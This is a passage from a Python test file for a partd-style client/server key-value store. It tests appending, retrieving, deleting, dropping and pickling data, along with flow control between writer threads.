finally:
s.close()
def dont_test_flow_control():
path = 'bar'
if os.path.exists('bar'):
shutil.rmtree('bar')
s = Server('bar', available_memory=1, n_outstanding_writes=3, start=False)
p = Client(s.address)
try:
listen_thread = Thread(target=s.listen)
listen_thread.start()
""" Don't start these threads
self._write_to_disk_thread = Thread(target=self._write_to_disk)
self._write_to_disk_thread.start()
self._free_frozen_sockets_thread = Thread(target=self._free_frozen_sockets)
self._free_frozen_sockets_thread.start()
"""
p.append({'x': b'12345'})
sleep(0.1)
assert s._out_disk_buffer.qsize() == 1
p.append({'x': b'12345'})
p.append({'x': b'12345'})
sleep(0.1)
assert s._out_disk_buffer.qsize() == 3
held_append = Thread(target=p.append, args=({'x': b'123'},))
held_append.start()
sleep(0.1)
assert held_append.is_alive() # held!
assert not s._frozen_sockets.empty()
write_to_disk_thread = Thread(target=s._write_to_disk)
write_to_disk_thread.start()
free_frozen_sockets_thread = Thread(target=s._free_frozen_sockets)
free_frozen_sockets_thread.start()
sleep(0.2)
assert not held_append.is_alive()
assert s._frozen_sockets.empty()
finally:
s.close()
@contextmanager
def partd_server(**kwargs):
with Server(**kwargs) as server:
with Client(server.address) as p:
yield (p, server)
def test_partd_object():
with partd_server() as (p, server):
p.append({'x': b'Hello', 'y': b'abc'})
p.append({'x': b'World!', 'y': b'def'})
result = p.get(['y', 'x'])
assert result == [b'abcdef', b'HelloWorld!']
def test_delete():
with partd_server() as (p, server):
p.append({'x': b'Hello'})
assert p.get('x') == b'Hello'
p.delete(['x'])
assert p.get('x') == b''
def test_iset():
with partd_server() as (p, server):
p.iset('x', b'111')
p.iset('x', b'111')
assert p.get('x') == b'111'
def test_tuple_keys():
with partd_server() as (p, server):
p.append({('x', 'y'): b'123'})
assert p.get(('x', 'y')) == b'123'
def test_serialization():
with partd_server() as (p, server):
p.append({'x': b'123'})
q = pickle.loads(pickle.dumps(p))
assert q.get('x') == b'123'
def test_drop():
with partd_server() as (p, server):
p.append({'x': b'123'})
p.drop()
assert p.get('x') == b''
def dont_test_server_autocreation():
with Client() as p:
p.append({'x': b'123'})
assert p.get('x') == b'123'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.